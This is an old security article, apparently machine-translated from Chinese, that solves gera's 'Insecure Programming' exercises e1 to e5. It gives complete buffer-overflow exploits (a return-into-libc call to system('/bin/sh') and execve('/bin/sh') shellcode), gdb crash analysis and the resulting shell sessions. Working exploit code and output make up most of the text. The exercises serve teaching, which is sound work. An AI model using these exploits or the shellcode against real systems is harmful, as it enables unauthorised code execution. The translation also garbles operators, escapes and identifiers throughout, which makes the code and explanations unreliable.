Advanced
Creation time: 2002-01-17
Article attribute: original
Article Source:
http://www.xfocus.org/
Article submission:
Alert7 (sztcww_at_sina.com)
Advanced
By alert7
Home:
http://www.xfocus.org/ http://www.whitecell.org/
Company: Huatai Net Anne
http://www.netguard.com.cn>
Time: 2002-1-17
★★ three advanced articles
Test Environment Redhat 6.2 GLIBC 2.1.3
★ 3.1 Demonstration
/ * e1.c *
/ * specially crafted to feed your brengu by gera@core-sdi.com * /
/ * jumpy vfprintf, batman! * /
INT Main (int Argv, char ** argc) {
/ * CAN you do it Changing the stack? * /
/ * CAN you do it without changing it? * /
Printf (Argc [1]);
While (1);
}
Please refer to the <<< using formatted string overlay * printf () series function itself returns Address >>
★ 3.2 Demo 2
/ * e2.c *
/ * specially crafted to feed your brengu by gera@core-sdi.com * /
/ * Now Your Misson Is To Make Abo1 Act Like this Other Program:
*
CHAR BUF [100];
While (1) {
Scanf ("% 100S", BUF);
SYSTEM (BUF);
}
* But, you cannot Execute Code in Stack.
* /
INT Main (int Argv, char ** argc) {
Char BUF [256];
STRCPY (BUF, Argc [1]);
}
The only condition that needs to satisfy is that Stack is not running.
[Alert7 @ redhat62 alert7] $ ./e2 `perl -e 'print" a "x264'`
Segmentation Fault (Core Dumped)
[alert7 @ redhat62 alert7] $ GDB E2 Core -q
Core was generated by `.
Program Terminated with Signal 11, Segmentation Fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
# 0 0x61616161 in ?? ()
/ * exp_e2.c
* Alert7 Exploit for E2
* /
#include
#define ret_position 260
#define nop 0x90 # define bufaddr 0xBfffff968
#define system 0x4005aae0
Char shell [] = "/ bin / sh"; / * .string / "/ bin / sh /" * /
INT main (int Argc, char ** argv)
{
Char buff [1024], * PTR;
Int retradd
INT I;
Retaddr = system;
IF (Argc> 1)
Retaddr = system atoi (argv [1]);
Bzero (BUFF, 1024);
For (i = 0; i <300; i )
BUFF [I] = NOP;
* ((long *) & (buff [RET_POSITION-4])) = BUFADDR 4 * 3 Strlen (shell);
* ((long *) & (buff [RET_POSITION]) = Retaddr;
* ((long *) & (buff [RET_POSITION 4])) = 0xABBCCDD; // When system returns the EIP
* ((long *) & (buff [RET_PSITION 8])) = BUFADDR RET_POSITION 4 * 3;
PTR = BUFF RET_POSITION 12;
STRCPY (PTR, Shell);
Printf ("Jump to 0x% 08x / N", Retdd);
EXECL ("./ E2", "E2", BUFF, 0);
}
[Alert7 @ redhat] $ gcc -o exp_e2 exp_e2.c
[Alert7 @ redhat] $ ./exp_e2
Jump to 0x4005aae0
Bash $ ID
UID = 501 (Alert7) GID = 501 (Alert7) Groups = 501 (Alert7)
Bash $ exit
exit
Segmentation Fault (Core Dumped)
Memory growth direction
------>
| xxxxxx | EBP | EIP | EIP1 | Parameter Pointer | / BIN / SH |
| 260 BYtes | |
|
| -> MAIN executes the ESP after RET, EBP value is EBP
EIP1 returns the address for the system call (of course, if system returns)
Parameter pointer points to / bin / sh
Here we make EIP1 to 0xAabbccdd, so / bin / sh is returned to 0xAabbcdd Coredump.
That is to say, as long as we carefully constructor, you can construct a function call chain. For example, we need to call
SetUID (0) -> System ("/ bin / sh") -> EXIT (0);
This exploit can be successful, to a large extent, because the address of SYSTEM does not contain 0, that is, Stack is not
The executable patch does not make the library library mmap to the memory low end.
More defeat cannot be executed STACK patch for reference:
<< Method of Bypass Linux Does Not Executable Stack Protection >> by Waring3
And recently p58
<< THE Advanced Return-Into-Lib (c) Exploits >> by Nergal
/ * E3.c *
* specially crafted to feed your brey by gera@core-sdi.com * /
/ * Are you an enviromental threat * /
Char BUF [256];
INT Main (int Argv, char ** argc) {
STRCPY (BUF, Argc [1]);
SetENV ("ABO", Argc [2], 1);
While (1);
}
[alert7 @ redhat] $ uname -a
Linux redhat 2.2.14-5.0 # 1 Tue Mar 7 21:07:39 EST 2000 i686 Unknown
[Alert7 @ redhat] $ gcc -o e3 e3.c -static // is still like static compilation
[alert7 @ redhat] $ ./e3 `perl -e 'print" a "x267'`
Segmentation Fault (Core Dumped)
[alert7 @ redhat] $ GDB E3 Core -q
Core Was generated by `/e a a a a a` a `a` a `a ca
Aaaaaaaaaaaaaaaaaaaaaa.
Program Terminated with Signal 11, Segmentation Fault.
# 0 0x616161 in ?? ()
(GDB) quit
[Alert7 @ redhat] $ ./e3 `perl -e 'print" a "x268'` a
Segmentation Fault (Core Dumped)
[alert7 @ redhat] $ GDB E3 Core -q
Core Was generated by `/e a a a a a` a `a` a `a c c c a c c` `3 3` ``
Aaaaaaaaaaaaaaaaaaaaaa.
Program Terminated with Signal 11, Segmentation Fault.
# 0 0x61616161 in ?? ()
(GDB) BT
# 0 0x61616161 in ?? ()
# 1 0x804ac85 in __libc_realloc (oldmem = 0x0, Bytes = 88) at malloc.c: 3209
# 2 0x804d18b in realoc_hook_ini (PTR = 0x0, SZ = 88, Caller = 0x804857c)
At malloc.c: 1770
# 3 0x804abb3 in __libc_realloc (oldmem = 0x0, bytes = 88) at malloc.c: 3196
# 4 0x804857c in __add_to_environ (name = 0x80718e8 "ABO", value = 0xBffffcc8 "a",
Combined = 0x0, replace = 1) at ../sysdeps/generic/setenv.c:145#5 0x804882b in __setenv (name = 0x80718e8 "ABO", value = 0xBfffffcc8 "a",
Replace = 1) at ../sysdeps/generic/setenv.c:263
# 6 0x80481ce in main ()
# 7 0x804831b in __libc_start_main (main = 0x80481a0
Argv = 0xBffffb24, init = 0x80480b4 <_init>, fini = 0x80718ac <_fini>,
RTLD_FINI = 0, stack_end = 0xBffffb1c) at ../sysdeps/generic/libc-start.c:92
Based on the above conditions, we can completely do not necessarily ignite what happened within the SETENV (). Just know
A value is placed in the BUF 264, which will become EIP.
/ * exp_e3.c
* Alert7 Exploit for Static E3
* /
#include
#define ret_position 264
#define nop 0x90
#define bufaddr 0x807bf60 // 0xaabbccdd
Char shellcode [] =
"/ Xeb / x1f" / * jmp 0x1f * /
"/ x5e" / * popl% ESI * /
"/ x89 / x76 / x08" / * movl% ESI, 0x8 (% ESI) * /
"/ x31 / xc0" / * xorl% EAX,% EAX * /
"/ x88 / x46 / x07" / * MOVB% EAX, 0x7 (% ESI) * /
"/ x89 / x46 / x0c" / * movl% EAX, 0xc (% ESI) * /
"/ XB0 / X0B" / * MOVB $ 0XB,% Al * /
"/ x89 / xf3" / * MOVL% ESI,% EBX * /
"/ x8d / x4e / x08" / * LEAL 0x8 (% ESI),% ECX * /
"/ X8D / X56 / X0C" / * LEAL 0XC (% ESI),% EDX * /
"/ xcd / x80" / * int $ 0x80 * /
"/ x31 / xdb" / * xorl% EBX,% EBX * /
"/ x89 / xd8" / * movl% EBX,% EAX * /
"/ x40" / * Inc% EAX * / "/ XCD / X80" / * int $ 0x80 * /
"/ XE8 / XDC / XFF / XFF / XFF" / * CALL-0X24 * /
"/ bin / sh"; / * .string / "/ bin / sh /" * /
INT main (int Argc, char ** argv)
{
Char buff [1024], * PTR;
Int retradd
INT I;
Retaddr = bufaddr;
IF (Argc> 1)
Retdr = BUFADDR ATOI (Argv [1]);
Bzero (BUFF, 1024);
For (i = 0; i <1024; i = 4)
* ((long *) & (buff [i])) = retradd
For (i = 0; i <100; i )
BUFF [I] = NOP;
PTR = BUFF 50;
For (i = 0; i * (PTR ) = shellcode [i]; // The content of BUFF is now // nnnnnnnnnnnnnnssssssssssssssssssaaaaaaaaaaaaaaaaaa / 0 Printf ("Jump to 0x% 08x / N", Retdd); EXECL ("./ E3", "E3", BUFF, 0); } [Alert7 @ redhat62 alert7] $ gcc -o exp_e3 exp_e3.c [alert7 @ redhat62 alert7] $ ./exp_e3 Jump to 0x0807bf60 Bash $ ID UID = 502 (Alert7) GID = 502 (Alert7) Groups = 502 (Alert7) success:) Shellcode is in the HEAP, so it may be able to bypass some protection of STACK. It is necessary to guess the address of Shellcode in HEAP and lose some versatility. Tracking the problem of __libc_malloc () for half a day, discovered or static compile 0x8049FF5 <__ libc_malloc 89>: MOV 0x807c068,% EAX 0x8049ffa <__ libc_malloc 94>: test% EAX,% EAX 0x8049ffc <__ libc_malloc 96>: je 0x804a010 <__ libc_malloc 116> 0x8049ffe <__ libc_malloc 98>: Push $ 0x0 0x804a000 <__ libc_malloc 100>: Call *% EAX (GDB) I REG EAX Eax 0x61616161 1633771873 (GDB) x 0x807c068 0x807c068 <__ libc_internal_tsd_get>: 0x61616161 (GDB) P & __LIBC_INTERNAL_TSD_GET $ 1 = (void * (**) ()) 0x807c068 (GDB) P __libc_internal_tsd_get $ 2 = (void * (*) ()) 0x61616161 Our data covers the __libc_internal_tsd_get () function address, make __libc_internal_tsd_get () pointing 0x61616161. So Segmentation Fault Don't know __libc_internal_tsd_get () What is the role here? I don't know if I temporarily, depressed ~ ★ 3.4 Demo four / * e4.c * * specially crafted to feed your brey by gera@core-sdi.com * / / *% What the hell? * / Char BUF [256]; INT Main (int Argv, char ** argc) { STRCPY (BUF, Argc [1]); Printf ("Live AT 100%!"); While (1); } [Alert7 @ redhat] $ gcc -o e4 e4.c -static // is still like this situation when compiling [Alert7 @ redhat] $ ./e4 `perl -e 'print" a "x1408'` [Alert7 @ redhat] $ ./e4 `perl -e 'print" a "x1409'` Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB -Q E4 Core Core Was generated by `.................................... Program Terminated with Signal 11, Segmentation Fault. # 0 0x61616161 in ?? () (GDB) BT # 0 0x61616161 in ?? () # 1 0x8048681 in printf (Format = 0x8071548 "Live AT 100%!") AT Printf.c: 31 # 2 0x80481c3 in main () # 3 0x804831b in __libc_start_main (main = 0x80481a0 Argv = 0xBffff6a4, init = 0x80480B4 <_init>, fini = 0x807150c <_fini>, RTLD_FINI = 0, stack_end = 0xBfffff69c) at ../sysdeps/generic/libc-start.c:92 [Alert7 @ redhat62 alert7] $ ./e4 `perl -e 'print" a "x518'`perl -e' print" b "x891'` Segmentation Fault (Core Dumped) [Alert7 @ redhat62 alert7] $ GDB E4 CORE -Q Core was generated by `................................................................ # 0 0x62626161 in ?? () [Alert7 @ redhat62 alert7] $ ./e4 `perl -e 'print" a "x516'`perl -e' print" b "x893'` Segmentation Fault (Core Dumped) [Alert7 @ redhat62 alert7] $ GDB E4 CORE -Q Core Was generated by `.................................... Program Terminated with Signal 11, Segmentation Fault. # 0 0x62626262 in ?? () Based on the above conditions, we can completely do not have to pay out what happened in Printf (). Just know A value is placed in the BUF 516, which will become EIP. / * exp_e4.c * Alert7 Exploit for Static E4 * / #include #define ret_position 516 #define nop 0x90 #define bufaddr 0x807bbc0 // 0xaabbccdd Char shellcode [] = "/ Xeb / x1f" / * jmp 0x1f * / "/ x5e" / * popl% ESI * / "/ x89 / x76 / x08" / * movl% ESI, 0x8 (% ESI) * / "/ x31 / xc0" / * xorl% EAX,% EAX * / "/ x88 / x46 / x07" / * MOVB% EAX, 0x7 (% ESI) * / "/ x89 / x46 / x0c" / * movl% EAX, 0xc (% ESI) * / "/ XB0 / X0B" / * MOVB $ 0XB,% Al * / "/ x89 / xf3" / * MOVL% ESI,% EBX * / "/ x8d / x4e / x08" / * LEAL 0x8 (% ESI),% ECX * / "/ X8D / X56 / X0C" / * LEAL 0XC (% ESI),% EDX * / "/ xcd / x80" / * int $ 0x80 * / "/ x31 / xdb" / * xorl% EBX,% EBX * / "/ x89 / xd8" / * movl% EBX,% EAX * / "/ x40" / * Inc% EAX * / "/ xcd / x80" / * int $ 0x80 * / "/ XE8 / XDC / XFF / XFF / XFF" / * CALL-0X24 * / "/ bin / sh"; / * .string / "/ bin / sh /" * / INT main (int Argc, char ** argv) { Char buff [2048], * PTR; Int retradd INT I; Retaddr = bufaddr; IF (Argc> 1) Retdr = BUFADDR ATOI (Argv [1]); Bzero (BUFF, 2048); For (i = 0; i <2000; i ) BUFF [I] = NOP; * ((long *) & (buff [RET_POSITION]) = Retaddr; PTR = BUFF 50; For (i = 0; i * (PTR ) = shellcode [i]; Printf ("Jump to 0x% 08x / N", Retdd); EXECL ("./ E4", "E4", BUFF, 0); } [alert7 @ redhat62 alert7] $ ./exp_e4 Jump to 0x0807bbc0 Bash $ ID UID = 502 (Alert7) GID = 502 (Alert7) Groups = 502 (Alert7) success:) Universality is not required to guess the BUFADDR address. Program problem: 0x8050101 <_io_vfprintf 9361>: MOV 0x807BD40 (,% EDX, 4),% EDX 0x8050108 <_io_vfprintf 9368>: test% EDX,% EDX / / EDX = 0x62626262 0x805010a <_io_vfprintf 9370>: je 0x8050130 <_io_vfprintf 9408> 0x805010C <_io_vfprintf 9372>: add $ 0x28,% EAX 0x805010f <_io_vfprintf 9375>: push% EAX 0x8050110 <_io_vfprintf 9376>: push $ 0x1 0x8050112 <_io_vfprintf 9378>: MOV 0xffffAb4 (% EBP),% ECX 0x8050118 <_io_vfprintf 9384>: PUSH% ECX 0x8050119 <_io_vfprintf 9385>: Call *% EDX // Here you have a problem (GDB) x 0x807bd40 0x807BD40 <__printf_arginfo_table>: 0x61616161 As long as it is Printf ("% x"); this X is not known or a custom format, it will be utilized __printf_arginfo_table calls the corresponding function to explain the format, and __printf_arginfo_table The array is covered by our data, so we can get control. This is my rough understanding, and the specific analysis of the execution process of the PrintF function needs to be detailed. If you are wrong, please ask the ax. ★ 3.5 Demo 5 / * E5.c * * specially crafted to feed your brey by gera@core-sdi.com * / / * Is this possible? * / Char BUF [256]; INT Main (int Argv, char ** argc) { STRCPY (BUF, Argc [1]); PERROR (Argc [2]); While (1); } Static compile time (GDB) P & BUF $ 1 = ( *) 0x807BC00 [Alert7 @ redhat] $ GCC -O E5 E5.c -static [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x255'` a A: Success [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x256'` a Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 chunk_alloc (ar_ptr = 0x807a000, nb = 48) at malloc.c: 2762 2762 Malloc.c: no so file or directory. (GDB) BT # 0 chunk_alloc (ar_ptr = 0x807a000, nb = 48) at malloc.c: 2762 # 1 0x8049cf4 in __libc_malloc (Bytes = 44) at malloc.c: 2696 # 2 0x804e74a in _nl_make_l10nflist (l10nfile_list = 0x807b434, dirlist = 0x8071795 "/ usr / share / locale", dirlist_len = 18, Mask = 0, Language = 0xBfffff628 "en_us", territory = 0x0, codeset = 0x0, normalized_code = 0x0, modifier = 0x0, Special = 0x0, sponsor = 0x0, revision = 0x0, filename = 0xbffff630 "LC_MESSAGES / libc.mo", do_allocate = 0) at l10nflist.c: 201 # 3 0x804dd30 in _nl_find_domain (dirname = 0x8071795 "/ usr / share / locale", locale = 0xbffff628 "en_US", DomainName = 0xBffff630 "lc_messages / libc.mo") at FindDomain.c: 113 # 4 0x804d8b0 in __dcgettext (domainname = 0x8071786 "libc", msgid = 0x80727d4 "success", category = 5) at dcgetText.c: 395 # 5 0x804d06d in __strerror_r (errnum = 0, buf = 0xbfffff6cc ", buflen = 1024) at ../sysdeps/Generic/_strerror.c: 68 # 6 0x80486ae in perror (s = 0xBfffffcc8 "a") at Perror.c: 38 # 7 0x80481c7 in main () # 8 0x804831b in __libc_start_main (main = 0x80481a0 Fini = 0x807155c <_fini>, rtld_fini = 0, stack_end = 0xBffffb1c) at ../sysdeps/Generic/libc-start.c:92 (GDB) [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x257'` Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 chunk_alloc (ar_ptr = 0x8070061, nb = 48) at malloc.c: 2762 2762 Malloc.c: no so file or directory. (GDB) quit [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x258'` Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 chunk_alloc (ar_ptr = 0x8006161, NB = 48) at malloc.c: 27522752 malloc.c: no such file or directory. (GDB) quit [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x259'` Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 chunk_alloc (ar_ptr = 0x616161, nb = 48) at malloc.c: 2752 Malloc.c: no such file or directory. (GDB) quit [alert7 @ redhat] $ ./e5 `perl -e 'print" a "x260'` Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 chunk_alloc (ar_ptr = 0x61616161, nb = 48) at malloc.c: 2752 Malloc.c: no such file or directory. ./e5 `perl -e 'print" a "x260'` A ---./e5` perl -e' print "a" x264'` A is all above [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x265'` a Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 0x61 in ?? () (GDB) quit [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x266'` Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program terminated with signal 11, segmentation fault. # 0 0x6161 in ?? () (GDB) quit [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x267'` a Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 0x616161 in ?? () (GDB) quit [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x268'` Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 0x61616161 in ?? () (GDB) BT # 0 0x61616161 in ?? () # 1 0x804e74a in _nl_make_l10nflist (l10nfile_list = 0x807b434, dirlist = 0x8071795 "/ usr / share / locale", dirlist_len = 18, mask = 0, Language = 0xBfffff628 "en_us", territory = 0x0, codeset = 0x0, normalized_code = 0x0, modifier = 0x0, Special = 0x0, sponsor = 0x0, Revision = 0x0, filename = 0xBffff630 "lc_messages / libc.mo", do_allocate = 0) AT L10nflist.c: 201 # 2 0x804dd30 in _nl_find_domain (dirname = 0x8071795 "/ usr / share / local", locale = 0xBfffff628 "en_us", DomainName = 0xBffff630 "lc_messages / libc.mo") at FindDomain.c: 113 # 3 0x804d8b0 in __dcgettext (domainname = 0x8071786 "libc", msgid = 0x80727d4 "success", category = 5) at dcgetText.c: 395 # 4 0x804d06d in __strerror_r (errnum = 0, buf = 0xBfffff6cc ", buflen = 1024) at ../sysdeps/Generic/_strerror.c: 68 # 5 0x80486ae in perror (s = 0xBfffffcc8 "a") AT perror.c: 38 # 6 0x80481c7 in main () # 7 0x804831b in __libc_start_main (main = 0x80481a0 Fini = 0x807155c <_fini>, rtld_fini = 0, stack_end = 0xBffffb1c) at ../sysdeps/Generic/libc-start.c:92 ./e5 `perl -e 'print" a "x268'` A ---./e5` perl -e' print "a" x364'` A is as above [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x365'` Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 0x804d683 in __dcgettext (domainname = 0x8071786 "libc", msgid = 0x80727d4 "success", category = 5) at dcgetText.c: 282 282 dcgetText.c: no such file or directory. (GDB) X / I 0x804D683 0x804d683 <__ dcgettext 67>: pushl 0x4 (% EAX) (GDB) I REG EAX EAX 0x61 97 (GDB) quit [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x368'` A // This is old Segmentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E5 Core -q Core was generated by `......................................... Program Terminated with Signal 11, Segmentation Fault. # 0 0x804d683 in __dcgettext (domainname = 0x8071786 "libc", msgid = 0x80727d4 "success", category = 5) at dcgetText.c: 282 282 dcgetText.c: no such file or directory. (GDB) X / I 0x804D683 0x804d683 <__ dcgettext 67>: pushl 0x4 (% EAX) (GDB) I REG EAX EAX 0x61616161 1633771873 (GDB) BT # 0 0x804d683 in __dcgettext (domainname = 0x8071786 "libc", msgid = 0x80727d4 "success", category = 5) at dcgetText.c: 282 # 1 0x804d06d in __strerror_r (errnum = 0, buf = 0xBfffff65c ", buflen = 1024) at ../sysdeps/generic/_strerror.c: 68 # 2 0x80486ae in perror (s = 0xBfffffcc8 "a") at Perror.c: 38 # 3 0x80481c7 in main () # 4 0x804831b in __libc_start_main (main = 0x80481a0 Fini = 0x807155c <_fini>, rtld_fini = 0, stack_end = 0xbffffaac) at ../sysdeps/generic/libc-start.c:92 Argv [1] Length limit at 268 ---- 364 Buff 264 place is EIP / * exp_e5.c * Alert7 Exploit for Static E5 * / #include #define ret_position 264 #define nop 0x90 #define bufaddr 0x807bc00 // 0xaabbccdd Char shellcode [] = "/ Xeb / x1f" / * jmp 0x1f * / "/ x5e" / * popl% ESI * / "/ x89 / x76 / x08" / * movl% ESI, 0x8 (% ESI) * / "/ x31 / xc0" / * xorl% EAX,% EAX * / "/ x88 / x46 / x07" / * MOVB% EAX, 0x7 (% ESI) * / "/ x89 / x46 / x0c" / * movl% EAX, 0xc (% ESI) * / "/ XB0 / X0B" / * MOVB $ 0XB,% Al * / "/ x89 / xf3" / * MOVL% ESI,% EBX * / "/ x8d / x4e / x08" / * LEAL 0x8 (% ESI),% ECX * / "/ X8D / X56 / X0C" / * LEAL 0XC (% ESI),% EDX * / "/ xcd / x80" / * int $ 0x80 * / "/ x31 / xdb" / * xorl% EBX,% EBX * / "/ x89 / xd8" / * movl% EBX,% EAX * / "/ x40" / * Inc% EAX * / "/ xcd / x80" / * int $ 0x80 * / "/ XE8 / XDC / XFF / XFF / XFF" / * CALL-0X24 * / "/ bin / sh"; / * .string / "/ bin / sh /" * / INT main (int Argc, char ** argv) { Char buff [300], * PTR; Int retradd INT I; Retaddr = bufaddr; IF (Argc> 1) Retdr = BUFADDR ATOI (Argv [1]); Bzero (BUFF, 300); For (i = 0; i <299; i ) BUFF [I] = NOP; * ((long *) & (buff [RET_POSITION]) = Retaddr; PTR = BUFF 50; For (i = 0; i * (PTR ) = shellcode [i]; Printf ("Jump to 0x% 08x / N", Retdd); EXECL ("./ E5", "E5", BUFF, "A", 0); } [alert7 @ redhat62 alert7] $ ./exp_e5 JUMP TO 0X0807BC00 / / There are / 0, :( Segmentation Fault (Core Dumped) [alert7 @ redhat62 alert7] $ ./exp_e5 1 Jump to 0x0807bc01 Bash $ ID UID = 502 (Alert7) GID = 502 (Alert7) Groups = 502 (Alert7) success:) Same as follows (GDB) disass __libc_malloc DUMP of Assembler Code for Function __libc_malloc: ... 0x8049c95 <__ libc_malloc 89>: MOV 0x807BD08,% EAX 0x8049c9a <__ libc_malloc 94>: test% EAX,% EAX 0x8049c9c <__ libc_malloc 96>: je 0x8049cb0 <__ libc_malloc 116> 0x8049c9e <__ libc_malloc 98>: push $ 0x0 0x8049ca0 <__ libc_malloc 100>: Call *% EAX ... (GDB) I REG EAX Eax 0x61616161 1633771873 (GDB) x 0x807bd08 0x807BD08 <__ libc_internal_tsd_get>: 0x61616161 (GDB) P & __LIBC_INTERNAL_TSD_GET $ 2 = (void * (**) ()) 0x807bd08 (GDB) P __libc_internal_tsd_get $ 3 = (void * (*) ()) 0x61616161 The problem that appears is 3.3 ★ Summary: Gera is like a teacher, I have this test paper, and I am a student, I have done this test paper, so If you are wrong, please ask the teachers to correct. Or can you discuss anything. If you change it, you will not be true. Thank you again Gera@core-sdi.com to this test paper from us. http://community.core-sdi.com/~gera/insecureprogramming/insecureprogramming.tar.gz
